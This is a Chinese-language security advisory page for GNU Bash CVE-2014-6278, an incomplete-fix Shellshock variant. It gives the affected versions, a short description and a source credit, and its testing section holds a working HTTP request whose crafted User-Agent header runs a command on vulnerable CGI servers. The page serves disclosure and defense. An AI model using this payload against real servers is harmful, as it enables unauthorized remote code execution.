NSFOCUS绿盟科技

首页 -> 安全研究

安全研究

安全漏洞

GNU Bash不完整修复远程代码执行漏洞(CVE-2014-6278)

发布日期：2014-09-27
更新日期：2014-10-08

受影响系统：

GNU Bash <= 4.3 bash43-026

描述：

BUGTRAQ  ID: 70166
CVE(CAN) ID: CVE-2014-6278

Bash，Unix shell的一种，在1987年由布莱恩·福克斯为了GNU计划而编写。

GNU Bash 4.3 bash43-026及之前版本没有正确解析环境变量值中的函数定义，这可使远程攻击者通过构造的环境，利用此漏洞执行任意代码或者。此漏洞源于CVE-2014-6271, CVE-2014-7169, CVE-2014-6277的不完整修复。

<*来源：Michal Zalewski （lcamtuf@echelon.pl）

  链接：http://secunia.com/advisories/61549/
*>

测试方法：

警告

以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！

GET /some/script.cgi HTTP/1.0
User-Agent: () { _; } >_[$($())] { id >/tmp/hi_mom;

建议：

关于我们: 公司介绍; 公司荣誉; 公司新闻

联系我们: 公司总部; 分支机构; 海外机构

快速链接: 绿盟云; 绿盟威胁情报中心NTI; 技术博客